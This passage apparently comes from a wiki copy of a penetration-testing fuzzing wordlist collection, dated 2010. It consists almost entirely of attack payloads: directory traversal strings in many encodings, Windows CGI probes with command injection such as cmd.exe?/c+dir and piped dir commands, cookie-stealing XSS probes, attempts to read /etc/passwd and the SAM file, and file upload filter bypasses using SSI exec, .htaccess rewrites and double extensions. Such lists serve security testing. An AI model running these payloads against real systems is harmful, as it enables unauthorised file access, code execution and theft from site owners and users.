..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
///%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
\\\%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..//{FILE}&lt;br /&gt;
..//..//{FILE}&lt;br /&gt;
..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
..///..///{FILE}&lt;br /&gt;
..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..\\{FILE}&lt;br /&gt;
..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
./\/./{FILE}&lt;br /&gt;
./\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
./../{FILE}&lt;br /&gt;
./.././../{FILE}&lt;br /&gt;
./.././.././../{FILE}&lt;br /&gt;
./.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././.././../{FILE}&lt;br /&gt;
.\..\{FILE}&lt;br /&gt;
.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.//..//{FILE}&lt;br /&gt;
.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../..//{FILE}&lt;br /&gt;
../..//../{FILE}&lt;br /&gt;
../..//../..//{FILE}&lt;br /&gt;
../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//{FILE}&lt;br /&gt;
../..//../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//../..//{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\\{FILE}&lt;br /&gt;
..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
../..///{FILE}&lt;br /&gt;
../..//..///{FILE}&lt;br /&gt;
../..//../..///{FILE}&lt;br /&gt;
../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..///{FILE}&lt;br /&gt;
../..//../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..//../..///{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\..\\\{FILE}&lt;br /&gt;
..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Common Windows CGI   (Update: 17 March 2010 &lt;br /&gt;
# fuzz inside executable directories&lt;br /&gt;
# on windows, this is usually /scripts or /cgi-bin&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
cart32.exe&lt;br /&gt;
get32.exe&lt;br /&gt;
visadmin.exe&lt;br /&gt;
foxweb.exe&lt;br /&gt;
webplus.exe?about&lt;br /&gt;
fpsrvadm.exe&lt;br /&gt;
MsmMask.exe&lt;br /&gt;
cmd.exe?/c+dir&lt;br /&gt;
cmd1.exe?/c+dir&lt;br /&gt;
post32.exe|dir%20c:\\&lt;br /&gt;
cgitest.exe&lt;br /&gt;
hpnst.exe?c=p+i=&lt;br /&gt;
Pbcgi.exe&lt;br /&gt;
testcgi.exe&lt;br /&gt;
webfind.exe?keywords=01234567890123456789&lt;br /&gt;
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C&lt;br /&gt;
test-cgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
athcgi.exe?command=showpage&amp;amp;script='],[0,0]];alert('Vulnerable');a=[['&lt;br /&gt;
mkilog.exe&lt;br /&gt;
mkplog.exe&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
perl.exe?-v&lt;br /&gt;
perl.exe&lt;br /&gt;
ppdscgi.exe&lt;br /&gt;
c32web.exe/ChangeAdminPassword&lt;br /&gt;
windmail.exe&lt;br /&gt;
dbmlparser.exe&lt;br /&gt;
cgimail.exe&lt;br /&gt;
minimal.exe&lt;br /&gt;
rguest.exe&lt;br /&gt;
visitor.exe&lt;br /&gt;
webbbs.exe&lt;br /&gt;
wguest.exe&lt;br /&gt;
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15&lt;br /&gt;
cfgwiz.exe&lt;br /&gt;
Cgitest.exe&lt;br /&gt;
mailform.exe&lt;br /&gt;
post16.exe&lt;br /&gt;
imagemap.exe&lt;br /&gt;
htimage.exe/path/filename?2,2&lt;br /&gt;
htimage.exe&lt;br /&gt;
Webnews.exe&lt;br /&gt;
texis.exe/junk&lt;br /&gt;
apexec.pl?etype=odp&amp;amp;template=../../../../../../../../../../etc/passwd%00.html&amp;amp;passurl=/category/&lt;br /&gt;
sensepost.exe?/c+dir&lt;br /&gt;
testcgi.exe&lt;br /&gt;
testcgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
ion-p.exe?page=c:\winnt\repair\sam&lt;br /&gt;
../../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf &lt;br /&gt;
foxweb.dll&lt;br /&gt;
wconsole.dll&lt;br /&gt;
shtml.dll&lt;br /&gt;
scripts/slxweb.dll/getfile?type=Library&amp;amp;file=[invalid filename]&lt;br /&gt;
rightfax/fuwww.dll/?&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\&lt;br /&gt;
GW5/GWWEB.EXE&lt;br /&gt;
GW5/GWWEB.EXE?GET-CONTEXT&amp;amp;HTMLVER=AAA&lt;br /&gt;
GW5/GWWEB.EXE?HELP=bad-request&lt;br /&gt;
GWWEB.EXE?HELP=bad-request&lt;br /&gt;
echo.bat&lt;br /&gt;
echo.bat?&amp;amp;dir+c:\\&lt;br /&gt;
hello.bat?&amp;amp;dir+c:\\&lt;br /&gt;
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
input2.bat?|dir&lt;br /&gt;
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
test-cgi.bat&lt;br /&gt;
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass (Update: 17 March 2010 - notes only) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumerated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - Generic (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - PHP Specific (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/  to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar &lt;br /&gt;
# PHP on Windows&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - Microsoft Specific (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/  to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== PHP-Specific Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# PHP-Specific File Upload Filter Bypass Appends  (Update: 17 March 2010 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
{PHPSCRIPT}.php.doc&lt;br /&gt;
{PHPSCRIPT}.php.xls&lt;br /&gt;
{PHPSCRIPT}.php.xlsx&lt;br /&gt;
{PHPSCRIPT}.php.pdf&lt;br /&gt;
{PHPSCRIPT}.php.jpeg&lt;br /&gt;
{PHPSCRIPT}.php.gif&lt;br /&gt;
{PHPSCRIPT}.php.zip&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
